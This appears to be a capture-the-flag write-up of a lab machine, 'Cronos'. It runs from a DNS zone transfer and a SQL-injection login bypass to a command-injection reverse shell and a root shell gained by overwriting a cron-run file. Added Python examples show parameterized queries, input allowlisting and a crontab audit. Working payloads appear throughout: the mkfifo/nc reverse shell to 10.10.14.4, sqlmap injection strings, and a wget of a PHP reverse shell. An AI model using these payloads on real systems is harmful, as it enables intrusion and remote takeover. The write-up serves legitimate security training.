This machine was interesting because you had to do a lot of small things to reach the goal, among them adding the hosts to the hosts file and working the DNS by hand, because the usual tools did not work.

We start with an nmap scan

root@Kali2:~# nmap -sC -sV 10.10.10.13
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 21:57 CET
Nmap scan report for 10.10.10.13
Host is up (0.034s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.63 seconds

We do an nslookup

root@Kali2:~# nslookup
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa    name = ns1.cronos.htb.
> cronos.htb
Server:        10.10.10.13
Address:    10.10.10.13#53

Name:    cronos.htb
Address: 10.10.10.13

Next we can request a zone transfer (AXFR) from the DNS server and discover admin.cronos.htb (domained was no use in this case)

; <<>> DiG 9.11.5-P4-1-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.        604800    IN    SOA    cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.        604800    IN    NS    ns1.cronos.htb.
cronos.htb.        604800    IN    A    10.10.10.13
admin.cronos.htb.    604800    IN    A    10.10.10.13
ns1.cronos.htb.        604800    IN    A    10.10.10.13
www.cronos.htb.        604800    IN    A    10.10.10.13
cronos.htb.        604800    IN    SOA    cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 24 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Oct 29 22:04:30 CET 2019
;; XFR size: 7 records (messages 1, bytes 203)

Having discovered the hosts, we have to add them to the hosts file on Linux (/etc/hosts); it should look something like this

127.0.0.1    localhost
127.0.1.1    kali
10.10.10.13    cronos.htb  admin.cronos.htb

With that the web pages work.

We can run a very aggressive sqlmap scan and see that the login is vulnerable to SQL injection. I extracted the password hash but could not crack it. What I did instead was use admin'-- -- as the username to bypass the login and get in.

root@Kali2:~/Desktop# sqlmap --keep-alive --threads=10 --risk=3 --level=5 -r cronos
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org
[22:13:24] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 612 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=-8951' OR 5579=5579-- gqXx&password=a

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind (comment)
    Payload: username=a' RLIKE SLEEP(5)#&password=a

Database: admin
Table: users
[1 entry]
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
| 1  | admin    | 4f5fffa7b2340178a716e3832451e058 |
+----+----------+----------------------------------+
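Added example, not from the write-up: the kind of string-built login query that the admin'-- -- bypass (and sqlmap's boolean-based payload) exploits, beside the parameterized form, run against an in-memory SQLite copy of the `users` table. Password handling is simplified to a direct comparison against the stored column.

```python
import sqlite3

# Constructed stand-in for the `admin` database's `users` table from the
# sqlmap dump; the stored value is the hash shown there.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', "
                 "'4f5fffa7b2340178a716e3832451e058')")
    return conn

def login_vulnerable(conn, username, password):
    # The flaw: input is spliced into the SQL text, so a quote closes the
    # string literal and `-- ` turns the rest of the statement into a comment.
    sql = (f"SELECT id FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return conn.execute(sql).fetchone() is not None

def login_parameterized(conn, username, password):
    # Bound parameters travel separately from the SQL text; the same payload
    # is now just an unusual username that matches nothing.
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None

# The bypass used in the write-up and sqlmap's boolean-based payload.
BYPASS = "admin'-- --"
BLIND = "-8951' OR 5579=5579-- gqXx"

if __name__ == "__main__":
    conn = build_db()
    for user in (BYPASS, BLIND):
        print(f"{user!r}: vulnerable={login_vulnerable(conn, user, 'a')} "
              f"parameterized={login_parameterized(conn, user, 'a')}")
```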

Once inside we can send POST requests:

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
...
Cookie: PHPSESSID=0lf9ah4h4f2ogilon01ad15va5
Upgrade-Insecure-Requests: 1
 
command=traceroute&host=8.8.8.8

If we change command to

command=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.4+1235+>/tmp/f

We get a shell.
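The welcome.php handler hands the `command` and `host` fields to a shell, which is what lets the payload above run. As an added example (not the page's or the application's code), a Python handler that only accepts an allowlisted command, validates the host as an IP literal or plain hostname, and builds an argv list so no shell ever parses the request; the allowed command set, the hostname regex and the `run` helper are assumptions.

```python
import ipaddress
import re
import subprocess

# Allowlist: the `command` field may only pick a key here; it never reaches
# a shell. The write-up shows traceroute being offered; the set is assumed.
ALLOWED_COMMANDS = {
    "traceroute": ["traceroute"],
    "ping": ["ping", "-c", "4"],
}

# Hostname check (constructed): labels of letters, digits and hyphens only,
# so shell metacharacters and option-like leading hyphens can never appear.
LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
HOSTNAME_RE = re.compile(rf"^(?:{LABEL}\.)*{LABEL}$", re.IGNORECASE)

def validate_host(host):
    try:
        return str(ipaddress.ip_address(host))  # normalises IPv4/IPv6 literals
    except ValueError:
        pass
    if len(host) <= 253 and HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"rejected host: {host!r}")

def build_argv(command, host):
    if command not in ALLOWED_COMMANDS:
        raise ValueError(f"rejected command: {command!r}")
    return ALLOWED_COMMANDS[command] + [validate_host(host)]

def is_rejected(command, host):
    try:
        build_argv(command, host)
        return False
    except ValueError:
        return True

def run(command, host):
    # argv list + shell=False: nothing is parsed by /bin/sh, so `;`, `|` and
    # `>` in a request are plain characters, and they never get this far anyway.
    return subprocess.run(build_argv(command, host), capture_output=True,
                          text=True, timeout=60).stdout

# The write-up's injected `command` value, URL-decoded.
INJECTED = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 1235 >/tmp/f"

if __name__ == "__main__":
    print(build_argv("traceroute", "8.8.8.8"))
    print("injected command rejected:", is_rejected(INJECTED, "8.8.8.8"))
    print("host with ';' rejected:", is_rejected("traceroute", "8.8.8.8;id"))
```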

It is important to export TERM=xxx so the shell behaves properly, and, for some reason, to start with a clear (no idea why).

LinEnum shows us

# m h dom mon dow user    command
17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *    root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
www-data@cronos:/dev/shm$ ls -la /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 5492 Oct 30 00:27 /var/www/laravel/artisan
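The cron entry and the file listing above are the whole privilege-escalation condition: root runs, every minute, a file that www-data owns. As an added example that is not part of the write-up, a defender-side audit that parses system crontab lines, pulls out the absolute paths each root job touches, and flags regular files a non-root user could modify; the crontab sample and the fake filesystem (uid 33 for www-data) are constructed from the output above, and `risky_paths` takes `os.stat` by default for a live host.

```python
import os
import re
import stat

# "m h dom mon dow user command" lines, /etc/crontab style.
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.*)$")
ABS_PATH = re.compile(r"(?<![\w/])/[^\s;&|<>()\"']+")

def risky_paths(crontab_text, stat_fn=os.stat):
    # Regular files named in root's cron commands that a non-root user could change.
    findings = []
    for line in crontab_text.splitlines():
        m = CRON_LINE.match(line)
        if line.lstrip().startswith("#") or not m or m.group("user") != "root":
            continue
        for path in ABS_PATH.findall(m.group("cmd")):
            try:
                st = stat_fn(path)
            except OSError:
                continue  # e.g. /etc/cron.daily is absent in the sample below
            if not stat.S_ISREG(st.st_mode):
                continue  # dirs and devices skipped: /dev/null is 0666 by design
            if st.st_uid != 0:
                findings.append((path, f"owned by uid {st.st_uid}, not root"))
            elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, "group/world writable"))
    return findings

# Constructed sample: the crontab lines LinEnum printed above, plus a fake
# filesystem mirroring the ls -la output (uid 33 for www-data is assumed).
SAMPLE_CRONTAB = """\
# m h dom mon dow user    command
17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * *    root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""
FAKE_FS = {
    "/var/www/laravel/artisan": (stat.S_IFREG | 0o755, 33),
    "/usr/sbin/anacron": (stat.S_IFREG | 0o755, 0),
    "/etc/cron.hourly": (stat.S_IFDIR | 0o755, 0),
    "/dev/null": (stat.S_IFCHR | 0o666, 0),
}
def fake_stat(path):
    if path not in FAKE_FS:
        raise FileNotFoundError(path)
    mode, uid = FAKE_FS[path]
    return os.stat_result((mode, 0, 0, 1, uid, uid, 0, 0, 0, 0))

if __name__ == "__main__":
    for path, reason in risky_paths(SAMPLE_CRONTAB, fake_stat):
        print(f"{path}: {reason}")
```

Running it on a real host (`risky_paths(open("/etc/crontab").read())`) only inspects paths written literally in the crontab; a relative `php` resolved through PATH is not checked.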

artisan is writable by www-data, so we can put a PHP reverse TCP shell into it

www-data@cronos:/dev/shm$ wget 10.10.14.4:801/php-reverse-shell.php
--2019-10-30 00:26:47--  http://10.10.14.4:801/php-reverse-shell.php
Connecting to 10.10.14.4:801... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5492 (5.4K) [application/octet-stream]
Saving to: 'php-reverse-shell.php'

php-reverse-shell.p 100%[===================>]   5.36K  --.-KB/s    in 0.1s    

2019-10-30 00:26:47 (42.0 KB/s) - 'php-reverse-shell.php' saved [5492/5492]

www-data@cronos:/dev/shm$ cat php-reverse-shell.php > /var/www/laravel/artisan

From there we have it

root@Kali2:~/Desktop# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.13] 39512
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 00:28:01 up 8 min,  0 users,  load average: 0.00, 0.10, 0.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

With that we add one more machine to our tally 🙂